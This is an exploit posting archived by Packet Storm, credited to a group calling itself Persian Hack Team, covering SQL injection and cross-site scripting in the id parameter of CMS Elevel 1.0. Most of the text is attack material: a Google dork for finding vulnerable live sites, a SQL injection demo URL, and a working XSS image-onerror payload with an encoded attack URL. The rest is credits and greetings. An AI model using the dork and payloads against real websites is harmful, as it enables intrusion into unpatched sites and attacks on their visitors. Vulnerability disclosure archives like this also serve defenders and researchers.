CMS Elevel 1.0 Cross Site Scripting / SQL Injection

2016-06-20T00:00:00
ID PACKETSTORM:137549
Type packetstorm
Reporter T3NZOG4N
Modified 2016-06-20T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : CMS Elevel 1.0 - SQL Injection / XSS  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://www.elevel.it/privacy.php  
# Google Dork : "Web Design by Elevel" inurl:news.php  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 1.0  
# Date: 2016/06/19  
######################  
#  
# PoC:  
# id Parameter Vulnerable To SQL / XSS  
# 1-SQL Injection  
# Demo :   
# http://www.site.com/news.php?id=[SQL]  
#  
# 2- XSS  
# Payload = '><img onerror=alert(1) src="asd">  
# http://www.site.com/news.php?id=2%27%3E%3Cimg%20onerror=alert%28%22XSS%22%29%20src=%22asd%22%3E  
#   
# Please Free Yaser Ebrahimi  
#  
######################  
# Discovered by : T3NZOG4N & Mojtaba MobhaM & FireKernel  
# Greetz : Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members  
# SP Tnx: Dr.askar zade  
# Homepage : persian-team.ir  
######################  
`